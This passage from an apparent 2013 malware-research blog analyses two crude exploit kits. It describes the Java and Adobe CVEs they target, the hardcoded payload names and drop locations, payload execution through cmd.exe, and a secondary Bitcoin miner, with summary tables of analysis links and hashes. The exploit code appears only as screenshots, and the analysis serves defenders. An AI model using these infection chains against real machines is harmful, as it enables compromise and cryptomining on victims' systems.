<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKNeizuClMTbBGtXCaUtdQSiJhnhbmdCNgnEVcLiAoKDSmNTj01HEdH3hhGLfBPsm4euwZJuq5ci9GoetNJV3PyCmqIllg4b7LcVsWOq0vJmviwMgkfCDX5wdTogWqcP1jRY-I7ACuSzAh/s1600/Unknown-2013-09-27_Java7_URL_location.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKNeizuClMTbBGtXCaUtdQSiJhnhbmdCNgnEVcLiAoKDSmNTj01HEdH3hhGLfBPsm4euwZJuq5ci9GoetNJV3PyCmqIllg4b7LcVsWOq0vJmviwMgkfCDX5wdTogWqcP1jRY-I7ACuSzAh/s1600/Unknown-2013-09-27_Java7_URL_location.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Initial Payload URL + store location + filename</span></i></div>
<br />
There is one extra step performed for the Initial Payload delivered by Java 7 JAR file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2sggNebTtZJujNHOYg6uv-X3Ui1eiTlXAjP_pVyD5ajoOzK-mcY-flSmFMc0yqc2yb-iDRM5jT94n5P2zDTGGXmvzm6KuwlikoUDNGa1K-AS4LPwCZqek_s3scZ9SlM6lXgjx_KY_8cPS/s1600/Unknown-2013-09-27_Java7_hide_payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2sggNebTtZJujNHOYg6uv-X3Ui1eiTlXAjP_pVyD5ajoOzK-mcY-flSmFMc0yqc2yb-iDRM5jT94n5P2zDTGGXmvzm6KuwlikoUDNGa1K-AS4LPwCZqek_s3scZ9SlM6lXgjx_KY_8cPS/s1600/Unknown-2013-09-27_Java7_hide_payload.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">applying file attributes - '<span style="color: #3d85c6;">hidden</span>' and '<span style="color: #3d85c6;">system</span>'</span></i></div>
<br />
'<span style="color: #3d85c6;">hidden</span>' and '<span style="color: #3d85c6;">system</span>' file attributes are set on the Initial Payload file stored in Java Temp folder. It's worth mentioning the Initial Payload is not '<span style="color: #3d85c6;">protected</span>' in any way during transmission.<br />
<br />
<b><span style="color: #3d85c6;">"Summary"</span></b><br />
<br />
Lack of originality, lack of sophistication... Really simple exploit kit. Nothing to highlight here. I wonder about the success rate for it. Some details below.<br />
<br />
<style type="text/css">.nobrtable br { display: none }</style>
<br />
<div class="nobrtable">
<table align="center" border="2" bordercolor="#FFFFFF" cellpadding="3" cellspacing="3" style="background-color: black; width: 100%px;">
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>General Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Unknown</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2013-09-27</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-09-28</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">PCAP from <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a>. Live Fiddler capture</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java 6, Java 7, IE7, IE8</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;"><pre>CVE-2012-1723
CVE-2013-1347
CVE-2013-2465
CVE-???</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">encoded / gzip</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.6.23 / Java 1.7.15</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">Java Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Hardcoded - 'TMPprovider0.dll'</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Not implemented</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>Java 6 JAR - <a href="https://www.virustotal.com/en/file/7bfe57ba4fd56fc10e06e98dfae614530c3ed27b4f5f241a2a9b023e991aa814/analysis/" rel="nofollow" target="_blank">virustotal.com</a>
Java 7 JAR - <a href="https://www.virustotal.com/en/file/0e1089d453acfc63ecee6f36f5ba09d700467825d03c5b854a675a6c1ae67cf9/analysis/" rel="nofollow" target="_blank">virustotal.com</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>EXE(MD5 8f8471acff7e18f61dc2def2bc353574)
<a href="https://malwr.com/analysis/N2FkNmVhNjg2MzQ2NGMzMjkyNjBjMDY1MDNiMTcwYzM/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/92c959c36617445a35e6f4f2ee2733861aa1b3baf8728d19a4fd5176f3c80401/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a></pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;"><pre>Initial Payload crashes in VM
Possibly VM/debug aware</pre>
</td>
</tr>
</tbody></table>
</div>
<br />
External links:<br />
<br />
<a href="http://urlquery.net/report.php?id=5963492">http://urlquery.net/report.php?id=5963492</a><br />
<a href="http://blogs.cisco.com/security/watering-hole-attacks-target-energy-sector/">http://blogs.cisco.com/security/watering-hole-attacks-target-energy-sector/</a><br />
<a href="http://www.exploit-db.com/exploits/25294/">http://www.exploit-db.com/exploits/25294/</a><br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-24949069875299161662013-09-08T01:25:00.000+01:002018-11-02T23:01:12.900+00:00Unknown EK: "... It ain't no trick, To get rich quick, If ya dig dig dig ..."Yet, another '<span style="color: #3d85c6;">wannabe</span>' exploit kit in the making. Thanks to <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a> for sharing this sample. The sample was discovered through <a href="https://twitter.com/urlquery" rel="nofollow" target="_blank">@urlquery</a> service. <br />
<br />
NOTE: The information is based on a sample captured on 2013-09-05<br />
<br />
<b><span style="color: #3d85c6;">"Heigh-ho, Heigh-ho"</span></b><br />
<br />
URL pattern is rather '<span style="color: #3d85c6;">messy</span>', but at the same time unique.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_usbriAtOweYAGDnxwuvBQT0358XNKuWm6kDwye-j4L-CJKSbiHrKsS9_zAKl2vx7igED9K3saCNbRLSV6mEDYfvTRGEYatMeLK3VcPAjdOqeZaY6Pz3I1qWm5xCp3gIRN9EAjnqYA0T5/s1600/Unknown_2013-09-06_URL_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_usbriAtOweYAGDnxwuvBQT0358XNKuWm6kDwye-j4L-CJKSbiHrKsS9_zAKl2vx7igED9K3saCNbRLSV6mEDYfvTRGEYatMeLK3VcPAjdOqeZaY6Pz3I1qWm5xCp3gIRN9EAjnqYA0T5/s1600/Unknown_2013-09-06_URL_pattern.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">HTTP requests observed</span></i></div>
<br />
The Landing Page is as simple as it can only be. No fancy JavaScripts, no obfuscation, no data encoding. It targets Java and Adobe products by bombarding a potential victim machine with all it's got - doesn't do any version checks. Here is the list of vulnerabilities it tries to exploit:<br />
<ul>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188" rel="nofollow" target="_blank">CVE-2010-0188</a> (Adobe Reader and Acrobat before 8.2.1 and before 9.3.1)</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297" rel="nofollow" target="_blank">CVE-2010-1297</a> (Adobe Flash Player before 9.0.277.0 and before 10.1.53.64; Adobe AIR before 2.0.2.12610; and Adobe Reader and Acrobat before 9.3.3, and before 8.2.3)</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2884" rel="nofollow" target="_blank">CVE-2010-2884</a> (Adobe Flash Player 10.1.82.76 and earlier and Adobe Reader and Acrobat before 9.4 and before 8.2.5)</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2992" rel="nofollow" target="_blank">CVE-2008-2992</a> (Adobe Acrobat and Reader 8.1.2 and earlier)</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465" rel="nofollow" target="_blank">CVE-2013-2465</a> (Java 7 through to update 21, Java 6 update 45 and earlier) </li>
</ul>
<div>
Adobe infection vector starts with assembly of an array that holds the list of URLs pointing at the malicious PDF files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib1RTgUaUVpneDljkne8l1xbOMI_cGZ7ks4ZsdFQ4RnZa2FFzEH2JHwGrnsllzhDWmrWKW_fzY_NHWZbn9Ec7nBzgRaRga7A8NHQhoovgGeWwQ-qqyk9awKqeNI8dTaQfHdK0o2WLn-Ixa/s1600/Unknown_2013-09-06_Adobe_assembly.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib1RTgUaUVpneDljkne8l1xbOMI_cGZ7ks4ZsdFQ4RnZa2FFzEH2JHwGrnsllzhDWmrWKW_fzY_NHWZbn9Ec7nBzgRaRga7A8NHQhoovgGeWwQ-qqyk9awKqeNI8dTaQfHdK0o2WLn-Ixa/s1600/Unknown_2013-09-06_Adobe_assembly.png" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>filling up array with URLs</i></span></div>
<br />
Once the array is ready, the malicious PDFs are requested one by one using this function:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfEXKgIVKV29POBdWSUDdSequG9s_XDwqI1nhBJG3rmcsnLp5rdPxUS_GMdXszQQnvpbPsq5drEGcbMQQiJTt8fh6FIEwjJzLd0e9PFULqHDB_LaMBHdUDigG4qqFUEbJEGlFZS3dHMWla/s1600/Unknown_2013-09-06_Adobe_launch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfEXKgIVKV29POBdWSUDdSequG9s_XDwqI1nhBJG3rmcsnLp5rdPxUS_GMdXszQQnvpbPsq5drEGcbMQQiJTt8fh6FIEwjJzLd0e9PFULqHDB_LaMBHdUDigG4qqFUEbJEGlFZS3dHMWla/s1600/Unknown_2013-09-06_Adobe_launch.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">requesting malicious PDFs</span></i></div>
<br />
It's possible that multiple copies of the Initial Payload will be requested if Adobe product installed on a victim's PC is vulnerable to more than one exploit attempted. It's hard to tell though what exactly is going to happen in this scenario since the Initial Payload delivered through each Adobe exploit is stored with hardcoded name - '<span style="color: #3d85c6;">update.exe</span>' and in a predefined location - '<span style="color: #3d85c6;">user Temp folder</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNgQnRy5rLXf06afz7QYSKFntZ5GTDAuLKITk6RgYjVy_yo2ZDLs14gS8e8zKWNrHMfB0k3asSR5eSuuJH7Vjq4De95tqFrQaV-gWNq0umfAsGDT1-1DLIRXE8iqqZf7rcHfy7XK1P7WYJ/s1600/Unknown_2013-09-06_Adobe_payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNgQnRy5rLXf06afz7QYSKFntZ5GTDAuLKITk6RgYjVy_yo2ZDLs14gS8e8zKWNrHMfB0k3asSR5eSuuJH7Vjq4De95tqFrQaV-gWNq0umfAsGDT1-1DLIRXE8iqqZf7rcHfy7XK1P7WYJ/s1600/Unknown_2013-09-06_Adobe_payload.png" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>part of shellcode extracted from malicious PDF file</i></span></div>
<br />
Java infection vector starts with a request for malicious JAR file. No additional parameters (encoded URL, decoding key, etc,.) are passed to JVM.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmagAWectIZw6s8sQzI1oO2dlp23SO0yzjTZ81e1DxYR8H7Kck3di4r45wrIfH2yYE8pq7VFqpJ-8WvyIQDUW7dF4z0Ck_HhlUIKYrjSMwXUPKdW7ub18ycFTddhFYvAVQIdQhvVW8YBG0/s1600/Unknown_2013-09-06_JAR_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="35" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmagAWectIZw6s8sQzI1oO2dlp23SO0yzjTZ81e1DxYR8H7Kck3di4r45wrIfH2yYE8pq7VFqpJ-8WvyIQDUW7dF4z0Ck_HhlUIKYrjSMwXUPKdW7ub18ycFTddhFYvAVQIdQhvVW8YBG0/s1600/Unknown_2013-09-06_JAR_request.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">requesting JAR file using <object></span></i></div>
<br />
The author is possibly a big fan of '<a href="https://en.wikipedia.org/wiki/Toby_the_Tram_Engine" rel="nofollow" target="_blank">Toby The Tram Engine</a>'(sorry, couldn't resist). Anyway, the JAR file is armed with an exploit for CVE-2013-2465.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT1WvSkyhpovD6W6DTtxHYKtMM84kgJOA2dk_KwqJckkucyq4otGhplVmvlT59WxI4DMQzVaEYY37JpGS36RLHU29Yw8s6dM6br13Xg0gGZ8g9dpxnIhMQ1EdxAh7nfIH3z0Fx7pKNBQAD/s1600/Unknown_2013-09-06_CVE-2013-2465.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT1WvSkyhpovD6W6DTtxHYKtMM84kgJOA2dk_KwqJckkucyq4otGhplVmvlT59WxI4DMQzVaEYY37JpGS36RLHU29Yw8s6dM6br13Xg0gGZ8g9dpxnIhMQ1EdxAh7nfIH3z0Fx7pKNBQAD/s1600/Unknown_2013-09-06_CVE-2013-2465.png" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>part of CVE-2013-2465 exploit code</i></span></div>
<br />
Initial Payload is requested using hardcoded URL and stored in Java Temp folder with yet again hardcoded filename - '<span style="color: #3d85c6;">g.exe</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiVC35imx9dsqlsiR4wphwaeSKbJts02_V5gPQiitIE2Rqu1EPECS5OQaZ_kdQSlVKCtRHsK-zuam1IAGzhVWW3ltywZmlJeXshBbPdcHDognXJNZ4UUSBkmNMg6E_B1maTeMq_s1NjFQD/s1600/Unknown_2013-09-06_Initial_Payload_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiVC35imx9dsqlsiR4wphwaeSKbJts02_V5gPQiitIE2Rqu1EPECS5OQaZ_kdQSlVKCtRHsK-zuam1IAGzhVWW3ltywZmlJeXshBbPdcHDognXJNZ4UUSBkmNMg6E_B1maTeMq_s1NjFQD/s1600/Unknown_2013-09-06_Initial_Payload_request.png" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The Initial Payload execution method is rather interesting - '<span style="color: #3d85c6;">cmd.exe</span>' is used.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrHjQaAjk8QyazcvqnnAmSazc8gLeasvQx5-XDXZnk72SkAdogCfsZRaSAJd5LciNvFvf11tIH9X3hOzQ8KU8ZBTfpPVGQ6XgvMu_v6r-dDQ9f4oU1BpvoaW3ocjL-roFzAXErYMJGEoZO/s1600/Unknown_2013-09-06_Initial_Payload_execution.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="15" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrHjQaAjk8QyazcvqnnAmSazc8gLeasvQx5-XDXZnk72SkAdogCfsZRaSAJd5LciNvFvf11tIH9X3hOzQ8KU8ZBTfpPVGQ6XgvMu_v6r-dDQ9f4oU1BpvoaW3ocjL-roFzAXErYMJGEoZO/s1600/Unknown_2013-09-06_Initial_Payload_execution.png" width="320" /></a></div>
<br />
Once executed, it launches Internet browser and checks for Internet connectivity by '<span style="color: #3d85c6;">calling</span> <span style="color: #3d85c6;">home</span>'<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz8EHAxQc9kHpaGpvzF6U3rTSco9t8edCnyc_GUC4a7PWeytcM9sf5T8rC3vqTdmxJovICyMQlNaOzAhDB-ZRKe7zKM-VrJ9lHp7t_CaUErcxG0lEW3iXlqm2rGXdLMWTSOid1D-zQdFwy/s1600/Unknown_2013-09-06_Initial_Payload_callback.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz8EHAxQc9kHpaGpvzF6U3rTSco9t8edCnyc_GUC4a7PWeytcM9sf5T8rC3vqTdmxJovICyMQlNaOzAhDB-ZRKe7zKM-VrJ9lHp7t_CaUErcxG0lEW3iXlqm2rGXdLMWTSOid1D-zQdFwy/s1600/Unknown_2013-09-06_Initial_Payload_callback.png" width="320" /></a></div>
<br />
The browser will be redirected to '<span style="color: #3d85c6;">Google</span>', but additional payload will be requested on the background.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihm4pvXAp_VCzICNlDi_up1WnGbqUOnHdtFKCVYrWSeDsElFiflBqkY97t_-jjEGIO6eXlsKQDGvvhVyBzKIhGvhhewrQQo1stxSu6sYt7ImDzpTy_eTvQp0yJ126A8Hqn8AOWJGzdVWbo/s1600/Unknown_2013-09-06_Secondary_Payload_request1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihm4pvXAp_VCzICNlDi_up1WnGbqUOnHdtFKCVYrWSeDsElFiflBqkY97t_-jjEGIO6eXlsKQDGvvhVyBzKIhGvhhewrQQo1stxSu6sYt7ImDzpTy_eTvQp0yJ126A8Hqn8AOWJGzdVWbo/s1600/Unknown_2013-09-06_Secondary_Payload_request1.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">additional payload request</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5p_2lKd3Gk_ZKos2aoLdfBXFI8RQaU92zEf0yh1QotfsBwGVDiX0OiKWZ_1vLOkYVf-nHh0toO4c5xW5rILl18hGQpjCzgWyu3S2n-bCZYkEBg-HViOr4HionJa2Y8ienjD6IYKoqa1kR/s1600/Unknown_2013-09-06_Secondary_Payload_request2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5p_2lKd3Gk_ZKos2aoLdfBXFI8RQaU92zEf0yh1QotfsBwGVDiX0OiKWZ_1vLOkYVf-nHh0toO4c5xW5rILl18hGQpjCzgWyu3S2n-bCZYkEBg-HViOr4HionJa2Y8ienjD6IYKoqa1kR/s1600/Unknown_2013-09-06_Secondary_Payload_request2.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">this one turned out to be a BitCoin miner</span></i></div>
<br />
Neither Initial or additional payloads were transferred with any encoding/encryption applied. At the time of writing, all the 3 files had good coverage on VT(see summary for more details).<br />
<br />
<b><span style="color: #3d85c6;">Summary</span></b><br />
<br />
Another '<span style="color: #3d85c6;">piece of ... art</span>' work by someone who just learnt how to write '<span style="color: #3d85c6;">Hello, World!</span>'. I guess I should take a stab at naming it. '<span style="color: #3d85c6;">Toby EK</span>' sounds too simple and non-tech. '<span style="color: #3d85c6;"><a href="http://en.wikipedia.org/wiki/Teletubbies" rel="nofollow" target="_blank">Teletubbies</a> EK</span>' on the other hand reflects both the technical complexity of the exploit kit and the professional level of the author/authors. Well, anyway here is the summary for this particular sample.<br />
<br /></div>
<style type="text/css">.nobrtable br { display: none }</style>
<br />
<div class="nobrtable">
<table align="center" border="2" bordercolor="#FFFFFF" cellpadding="3" cellspacing="3" style="background-color: black; width: 100%px;">
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>General Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Unknown</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2013-09-05</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-09-07</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">PCAP from <a href="https://twitter.com/urlquery" rel="nofollow" target="_blank">@urlquery</a> shared by <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a></td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java, Adobe</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;"><pre>CVE-2010-0188
CVE-2010-1297
CVE-2010-2884
CVE-2008-2992
CVE-2013-2465</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">encoded / gzip</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.6.26</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">Java Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Hardcoded - 'g.exe'</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Adobe Reader 8</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">User Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Hardcoded - 'update.exe'</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>PDF1 - <a href="http://jsunpack.jeek.org/?report=bb7cc6807862fc411f6d021f9656990fb72da442" rel="nofollow" target="_blank">http://jsunpack.jeek.org/</a>
PDF2 - <a href="http://jsunpack.jeek.org/?report=818d9d76c4d759d13740a3ce5226df03649486b1" rel="nofollow" target="_blank">http://jsunpack.jeek.org/</a>
PDF3 - <a href="http://jsunpack.jeek.org/?report=c6549212e6a3cb089cb3e80606e87946f403cbd4" rel="nofollow" target="_blank">http://jsunpack.jeek.org/</a>
